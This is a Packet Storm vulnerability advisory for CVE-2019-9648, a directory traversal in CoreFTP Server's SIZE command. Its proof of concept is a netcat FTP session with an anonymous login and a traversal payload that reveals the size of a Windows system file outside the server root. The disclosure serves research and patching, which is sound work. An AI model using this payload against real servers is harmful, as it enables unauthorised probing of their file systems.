Lucene search
Kevin RandallPACKETSTORM:152056HistoryMar 11, 2019 - 12:00 a.m.
CoreFTP Server FTP / SFTP Server 2 Build 674 SIZE Directory Traversal
2019-03-1100:00:00
Kevin Randall
packetstormsecurity.com
26
EPSS
0.043
Percentile
92.4%
`CVE-2019-9648
CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal
Discovered By: Kevin Randall
Summary: By utilizing a directory traversal along with the FTP SIZE
command, an attacker can browse outside the root directory to determine if
a file exists based on return file size by using a ..\..\ technique
Tools used:
Parrot OS VM
Windows 7 VM
FTP / SFTP Server v2 - Build 674
Netcat
Proof of Concept (PoC):
File 1: ARP.exe
Type of file: Application(.EXE)
Description: TCP/IP Arp Command
Location: C:\Windows\System32\
Size: 20.5 KB (20,992 bytes)
Size on disk: 24.0 KB (24,576 bytes)
Created: Monday July 13, 2009 7:55:11 PM
Modified: Monday July 13, 2009, 9:14:12 PM
Accessed: Monday July 13, 2009 7:55:11 PM
#nc -nv 192.168.0.2 21
(UNKNOWN) [192.168.0.2] 21 (ftp) open
220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago
Unregistered
USER anonymous
331 password required for anonymous
PASS anonymous@
230-Logged on
230
SIZE C:\..\..\..\..\..\..\Windows\System32\ARP.exe
213 20992
`
Related
prion
prion
Directory traversal
2019-03-22 19:29:00
cvelist
cvelist
CVE-2019-9648
2019-03-22 18:49:47
osv
osv
CoreFTP Directory Traversal
2022-05-14 00:52:11
nvd
nvd
CVE-2019-9648
2019-03-22 19:29:00
zdt
zdt
exploitdb
exploitdb
CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
2020-03-11 00:00:00
exploitpack
exploitpack
Core FTP Server FTP SFTP Server v2 Build 674 - SIZE Directory Traversal
2019-03-13 00:00:00
github
github
CoreFTP Directory Traversal
2022-05-14 00:52:11
cve
cve
CVE-2019-9648
2019-03-22 19:29:00
packetstorm
packetstorm
CoreFTP Server SIZE Directory Traversal
2019-08-23 00:00:00